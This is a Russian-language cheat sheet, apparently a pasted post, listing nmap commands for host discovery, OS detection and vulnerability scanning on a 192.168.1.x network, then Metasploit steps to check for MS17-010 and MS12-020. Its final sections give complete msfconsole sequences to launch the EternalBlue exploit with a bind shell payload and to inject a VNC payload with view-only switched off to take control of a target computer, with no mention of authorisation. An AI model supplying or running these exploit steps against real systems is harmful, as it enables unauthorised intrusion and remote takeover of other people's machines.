Сканировать сеть на хосты и проверить на уязвимости

Сканировать сеть на хосты и проверить на уязвимости

Sam Sepiol

Просканировать всю сеть на наличие хостов:

Nmap -sS -А 192.168.1.2
nmap 192.168.1.0/24
nmap -sP 192.168.1.0/24
nmap -sV 192.168.1.1/24 - Эта команда будет проверять все 254 хостов в сети и перечислять открытые порты вместе с версией программного обеспечения, работающего на этом хосте.
nmap -A 192.168.1.2 - Эта команда позволит запускать все скрипты и много других вариантов, вот описание из меню справки: Enable OS detection, version detection, script scanning, and traceroute.

сканировать узел и узнать какая операционная система на нем работает:

sudo nmap -O -Pn 192.168.1.16 работает!!!
nmap -O 192.168.1.2
nmap -sS --script smb-os-discovery 192.168.1.14

сканировать хост на все уязвимости в nmap:

nmap 192.168.1.12 --script vuln

сканировать сеть на уязвимость smb_ms17_010:

msfconsole
search type:auxiliary ms17
use auxiliary/scanner/smb/smb_ms17_010
info
set rhosts 192.168.1.2 192.168.1.3 192.168.1.4
run

сканировать сеть на уязвимость ms12-020 RDP (удаленный рабочий стол):

msfconsole
search type:auxiliary ms12-020
use auxiliary/scanner/rdp/ms12_020_check
info
set rhosts 192.168.1.8
run

использовать эксплоит:

msfconsole
search type:exploit ms17_010
use exploit/windows/smb/ms17_010_eternalblue
info
show payloads
set payload windows/x64/shell/bind_tcp
set rhost 192.168.1.11
show options
exploit

управление компьютером с помощью программы VNC через payload

show payloads
set payload windows/x64/vncinject/bind_tcp
options
ViewOnly true - только просматривать
set viewonly false - позволяет управлять системой
run/exploit


Report Page